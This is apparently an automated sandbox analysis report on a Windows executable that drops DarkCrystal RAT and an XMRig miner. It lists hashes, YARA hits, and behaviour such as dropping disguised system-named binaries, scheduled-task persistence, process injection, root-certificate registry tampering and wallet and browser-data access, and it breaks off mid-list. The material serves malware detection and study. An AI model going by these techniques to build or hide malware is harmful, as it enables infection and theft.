Analysis
-
max time kernel
101s -
max time network
122s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
22-07-2021 22:41
Static task
static1
Behavioral task
behavioral1
Sample
Software v3.0.5.exe
Resource
win7v20210408
General
-
Target
Software v3.0.5.exe
-
Size
910KB
-
MD5
56d73f0b8c89094a9f0ad6277f042b3d
-
SHA1
6efe8b8257f030fdb63a069aad558b6282310a31
-
SHA256
c6c9d678a3313c5bb7fe71194a2a1e4d3ffca2f04252dd1983ba657cfe17320e
-
SHA512
6f003181b4118e421ec152f1297f7eb5f5e0b3276861c5ba8face20931aa75046dd95672f5120fc7f2acd65db69e0baaee0be7c3ed51a03ec3eab8b24c6a7379
Malware Config
Signatures
-
Processes:
resource yara_rule \Users\Admin\AppData\Roaming\Dcr.exe Dark_crystal_rat C:\Users\Admin\AppData\Roaming\Dcr.exe Dark_crystal_rat C:\Users\Admin\AppData\Roaming\Dcr.exe Dark_crystal_rat -
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Processes:
resource yara_rule \Users\Admin\AppData\Roaming\Dcr.exe dcrat C:\Users\Admin\AppData\Roaming\Dcr.exe dcrat C:\Users\Admin\AppData\Roaming\Dcr.exe dcrat \fonthostSvc\fonthostSvcIntodhcp.exe dcrat C:\fonthostSvc\fonthostSvcIntodhcp.exe dcrat C:\fonthostSvc\fonthostSvcIntodhcp.exe dcrat C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\conhost.exe dcrat C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\conhost.exe dcrat -
XMRig Miner Payload 3 IoCs
Processes:
resource yara_rule behavioral1/memory/1908-160-0x0000000140000000-0x0000000140758000-memory.dmp xmrig behavioral1/memory/1908-161-0x00000001402EB66C-mapping.dmp xmrig behavioral1/memory/1908-163-0x0000000140000000-0x0000000140758000-memory.dmp xmrig -
Executes dropped EXE 9 IoCs
Processes:
Dcr.exeetc.exexmr.exefonthostSvcIntodhcp.execonhost.exeservices64.exeservices32.exesihost32.exesihost64.exepid process 1728 Dcr.exe 1424 etc.exe 1952 xmr.exe 1308 fonthostSvcIntodhcp.exe 2000 conhost.exe 2036 services64.exe 2008 services32.exe 660 sihost32.exe 1928 sihost64.exe -
Loads dropped DLL 8 IoCs
Processes:
Software v3.0.5.execmd.exexmr.exeetc.exeservices32.exeservices64.exepid process 1640 Software v3.0.5.exe 1640 Software v3.0.5.exe 1640 Software v3.0.5.exe 1676 cmd.exe 1952 xmr.exe 1424 etc.exe 2008 services32.exe 2036 services64.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 8 ipinfo.io 9 ipinfo.io -
Drops file in System32 directory 12 IoCs
Processes:
fonthostSvcIntodhcp.exedescription ioc process File created C:\Windows\System32\capisp\69ddcba757bf72f7d36c464c71f42baab150b2b9 fonthostSvcIntodhcp.exe File created C:\Windows\System32\wbem\portabledevicetypes\24dbde2999530ef5fd907494bc374d663924116c fonthostSvcIntodhcp.exe File created C:\Windows\System32\C_863\c5b4cb5e9653cce737f29f72ba880dd4c4bab27d fonthostSvcIntodhcp.exe File created C:\Windows\System32\wbem\dot3\WmiPrvSE.exe fonthostSvcIntodhcp.exe File created C:\Windows\System32\wbem\dot3\24dbde2999530ef5fd907494bc374d663924116c fonthostSvcIntodhcp.exe File created C:\Windows\System32\chajei\886983d96e3d3e31032c679b2d4ea91b6c05afef fonthostSvcIntodhcp.exe File created C:\Windows\System32\capisp\smss.exe fonthostSvcIntodhcp.exe File created C:\Windows\System32\snmptrap\101b941d020240259ca4912829b53995ad543df6 fonthostSvcIntodhcp.exe File created C:\Windows\System32\chajei\csrss.exe fonthostSvcIntodhcp.exe File created C:\Windows\System32\wbem\portabledevicetypes\WmiPrvSE.exe fonthostSvcIntodhcp.exe File created C:\Windows\System32\C_863\services.exe fonthostSvcIntodhcp.exe File created C:\Windows\System32\snmptrap\lsm.exe fonthostSvcIntodhcp.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
services64.exedescription pid process target process PID 2036 set thread context of 1908 2036 services64.exe explorer.exe -
Drops file in Program Files directory 5 IoCs
Processes:
fonthostSvcIntodhcp.exedescription ioc process File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\System.exe fonthostSvcIntodhcp.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\System.exe fonthostSvcIntodhcp.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\27d1bcfc3c54e0e44ea423ffd4ee81fe73670a2a fonthostSvcIntodhcp.exe File created C:\Program Files\Windows Sidebar\Shared Gadgets\WMIADAP.exe fonthostSvcIntodhcp.exe File created C:\Program Files\Windows Sidebar\Shared Gadgets\75a57c1bdf437c0c81ad56e81f43c7323ed35745 fonthostSvcIntodhcp.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 15 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 1608 schtasks.exe 1616 schtasks.exe 1956 schtasks.exe 1924 schtasks.exe 1684 schtasks.exe 1148 schtasks.exe 1244 schtasks.exe 1860 schtasks.exe 1740 schtasks.exe 1152 schtasks.exe 1692 schtasks.exe 1312 schtasks.exe 1572 schtasks.exe 1916 schtasks.exe 1276 schtasks.exe -
Processes:
services32.exeservices64.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C services32.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 services32.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 190000000100000010000000a823b4a20180beb460cab955c24d7e21090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802025300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c00b000000010000001600000047006c006f00620061006c005300690067006e000000140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 services64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 services64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 services64.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 services64.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 190000000100000010000000a823b4a20180beb460cab955c24d7e21090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802025300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c00b000000010000001600000047006c006f00620061006c005300690067006e000000140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 services32.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a services64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C services64.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b0b000000010000001600000047006c006f00620061006c005300690067006e0000005300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b06010505080202200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 services32.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802025300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c00b000000010000001600000047006c006f00620061006c005300690067006e000000140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 services64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 services32.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
fonthostSvcIntodhcp.execonhost.exexmr.exeetc.exeservices32.exeservices64.exepid process 1308 fonthostSvcIntodhcp.exe 1308 fonthostSvcIntodhcp.exe 1308 fonthostSvcIntodhcp.exe 2000 conhost.exe 2000 conhost.exe 1952 xmr.exe 1424 etc.exe 2008 services32.exe 2036 services64.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
Processes:
fonthostSvcIntodhcp.execonhost.exexmr.exeetc.exeservices32.exeservices64.exeexplorer.exedescription pid process Token: SeDebugPrivilege 1308 fonthostSvcIntodhcp.exe Token: SeDebugPrivilege 2000 conhost.exe Token: SeDebugPrivilege 1952 xmr.exe Token: SeDebugPrivilege 1424 etc.exe Token: SeDebugPrivilege 2008 services32.exe Token: SeDebugPrivilege 2036 services64.exe Token: SeLockMemoryPrivilege 1908 explorer.exe Token: SeLockMemoryPrivilege 1908 explorer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Software v3.0.5.exeDcr.exeWScript.execmd.exefonthostSvcIntodhcp.execmd.exedescription pid process target process PID 1640 wrote to memory of 1728 1640 Software v3.0.5.exe Dcr.exe PID 1640 wrote to memory of 1728 1640 Software v3.0.5.exe Dcr.exe PID 1640 wrote to memory of 1728 1640 Software v3.0.5.exe Dcr.exe PID 1640 wrote to memory of 1728 1640 Software v3.0.5.exe Dcr.exe PID 1640 wrote to memory of 1424 1640 Software v3.0.5.exe etc.exe PID 1640 wrote to memory of 1424 1640 Software v3.0.5.exe etc.exe PID 1640 wrote to memory of 1424 1640 Software v3.0.5.exe etc.exe PID 1640 wrote to memory of 1424 1640 Software v3.0.5.exe etc.exe PID 1640 wrote to memory of 1952 1640 Software v3.0.5.exe xmr.exe PID 1640 wrote to memory of 1952 1640 Software v3.0.5.exe xmr.exe PID 1640 wrote to memory of 1952 1640 Software v3.0.5.exe xmr.exe PID 1640 wrote to memory of 1952 1640 Software v3.0.5.exe xmr.exe PID 1728 wrote to memory of 1984 1728 Dcr.exe WScript.exe PID 1728 wrote to memory of 1984 1728 Dcr.exe WScript.exe PID 1728 wrote to memory of 1984 1728 Dcr.exe WScript.exe PID 1728 wrote to memory of 1984 1728 Dcr.exe WScript.exe PID 1984 wrote to memory of 1676 1984 WScript.exe cmd.exe PID 1984 wrote to memory of 1676 1984 WScript.exe cmd.exe PID 1984 wrote to memory of 1676 1984 WScript.exe cmd.exe PID 1984 wrote to memory of 1676 1984 WScript.exe cmd.exe PID 1676 wrote to memory of 1308 1676 cmd.exe fonthostSvcIntodhcp.exe PID 1676 wrote to memory of 1308 1676 cmd.exe fonthostSvcIntodhcp.exe PID 1676 wrote to memory of 1308 1676 cmd.exe fonthostSvcIntodhcp.exe PID 1676 wrote to memory of 1308 1676 cmd.exe fonthostSvcIntodhcp.exe PID 1308 wrote to memory of 1608 1308 fonthostSvcIntodhcp.exe schtasks.exe PID 1308 wrote to memory of 1608 1308 fonthostSvcIntodhcp.exe schtasks.exe PID 1308 wrote to memory of 1608 1308 fonthostSvcIntodhcp.exe schtasks.exe PID 1308 wrote to memory of 1244 1308 fonthostSvcIntodhcp.exe schtasks.exe PID 1308 wrote to memory of 1244 1308 fonthostSvcIntodhcp.exe schtasks.exe PID 1308 wrote to memory of 1244 1308 fonthostSvcIntodhcp.exe schtasks.exe PID 1308 wrote to memory of 1152 1308 fonthostSvcIntodhcp.exe schtasks.exe PID 1308 wrote to memory of 1152 1308 fonthostSvcIntodhcp.exe schtasks.exe 